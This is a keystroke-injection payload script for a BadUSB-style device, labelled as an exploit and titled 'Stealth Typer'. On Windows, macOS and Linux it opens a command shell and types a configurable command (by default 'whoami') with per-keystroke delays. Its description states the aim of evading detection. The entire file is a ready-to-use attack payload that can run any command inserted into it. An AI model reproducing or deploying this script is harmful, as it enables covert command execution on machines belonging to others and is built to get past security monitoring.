NAME Stealth Typer
DESCRIPTION Types commands with human-like delays to evade detection
CATEGORY exploit
PLATFORMS WIN,MAC,LINUX
OPTION COMMAND whoami "Command to type slowly"
OPTION CHAR_DELAY 50 "Delay between keystrokes (ms)"
OPTION DELAY 2000 "Initial HID delay (ms)"
PLATFORM WIN
DELAY {{DELAY}}
LED_COLOR YELLOW
GUI r
DELAY 800
STRINGLN_DELAY {{CHAR_DELAY}} cmd
DELAY 1200
STRINGLN_DELAY {{CHAR_DELAY}} {{COMMAND}}
DELAY 1000
LED_COLOR GREEN
STRINGLN_DELAY {{CHAR_DELAY}} exit
PLATFORM MAC
DELAY {{DELAY}}
LED_COLOR YELLOW
GUI SPACE
DELAY 700
STRING_DELAY {{CHAR_DELAY}} Terminal
ENTER
DELAY 1400
STRINGLN_DELAY {{CHAR_DELAY}} {{COMMAND}}
LED_COLOR GREEN
PLATFORM LINUX
DELAY {{DELAY}}
LED_COLOR YELLOW
CTRL ALT t
DELAY 1400
STRINGLN_DELAY {{CHAR_DELAY}} {{COMMAND}}
LED_COLOR GREEN
